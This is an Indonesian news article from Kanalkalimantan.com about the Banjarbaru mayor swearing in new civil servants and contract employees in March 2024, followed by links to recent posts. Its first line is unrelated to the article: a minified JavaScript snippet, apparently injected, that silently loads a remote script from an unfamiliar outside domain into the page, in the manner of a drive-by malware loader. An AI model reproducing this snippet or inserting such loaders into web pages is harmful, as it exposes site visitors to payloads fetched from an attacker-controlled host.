(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Wali Kota Banjarbaru Melantik PNS dan PPPK 2024


KANALKALIMANTAN.COM, BANJARBARU – Ratusan Aparatur Sipil Negara (ASN) baru di lingkungan Pemerintah Kota Banjarbaru dilantik Wali Kota Banjarbaru Aditya Mufti Ariffin, Kamis (28/3/2024) siang.

ASN tersebut terdiri dari Pegawai Negeri Sipil (PNS) dan Pegawai Pemerintah dengan Perjanjian Kerja (PPPK) yang dilantik secara serentak di Gedung Bina Satria Banjarbaru.

“Untuk PPPK guru sebanyak 159 orang dan 91 orang PPPK kesehatan, untuk jabatan teknis 25 orang ditambah satu orang yang belum sempat. Jadi ada 26 orang PPPK teknis,” ujar Kepala Badan Kepegawaian dan Pendidikan Sumber Daya Manusia (BKPSDM) Banjarbaru Dr Gustafa Yandi.

Baca juga: Protes Pemilik Kandang Babi Tak Punya Pekerjaan Selain Beternak

Selain itu, Yandi menyebutkan ada empat orang lulusan Sekolah Tinggi Transportasi Darat (STTD) yang menerima surat keputusan (SK) CPNS dari Wali Kota Banjarbaru. Ditambah tiga orang PNS lulusan STTD yang menerima SK PNS.

Di sela pelantikan, Pemko Banjarbaru juga menyerahkan SK kenaikan pangkat dari Wali Kota Banjarbaru sebanyak 244 orang.

Rinciannya seperti, golongan IVc sebanyak 8 orang, golongan IVa dan IVb berjumlah 63 orang dan golongan IIId ke bawah ada 173 orang.

Baca juga: Seru! PLN Mengajar di TK Telkom Banjarbaru

“Mudah-mudahan para penerima SK dan yang sudah dilantik bisa menjalankan tugas dan fungsi sebaik-baiknya sesuai arahan Wali Kota,” ungkap Yandi.

Sementara itu, Wali Kota Banjarbaru Aditya Mufti Ariffin mengatakan, dengan adanya penambahan personel baru di lingkungan Pemko Banjarbaru disertai dengan kenaikan pangkat, pelayanan publik, dan tata kelola pemerintahan dapat berjalan lebih baik.

“Kita berharap personel baru karakter baru lebih profesional dan meningkatkan keterampilan untuk memberikan pelayanan yang lebih baik lagi untuk Banjarbaru,” jelas Aditya.

Baca juga: Golkar Kalsel Mulai Mengelus Jagoan Pilkada 13 Kabupetan Kota

Adapun pada tahun 2024 ini Pemko Banjarbaru mendapatkan kuota PPPK sebanyak 150 formasi. Nantinya, mereka akan diangkat dan diterima sebagai PPPK di tahun ini.

“Sisanya diangkat menjadi PPPK paruh waktu. PPPK paruh waktu bagi yang tidak lulus (PPPK) untuk 150 formasi,” tuntasnya menutup. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

2 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

2 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

4 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

6 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

7 jam ago

Waket I DPRD Kapuas Apresiasi Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Ketua I DPRD Kabupaten Kapuas Yohanes sangat mengapresiasi kegiatan pawai… Read More

8 jam ago

This website uses cookies.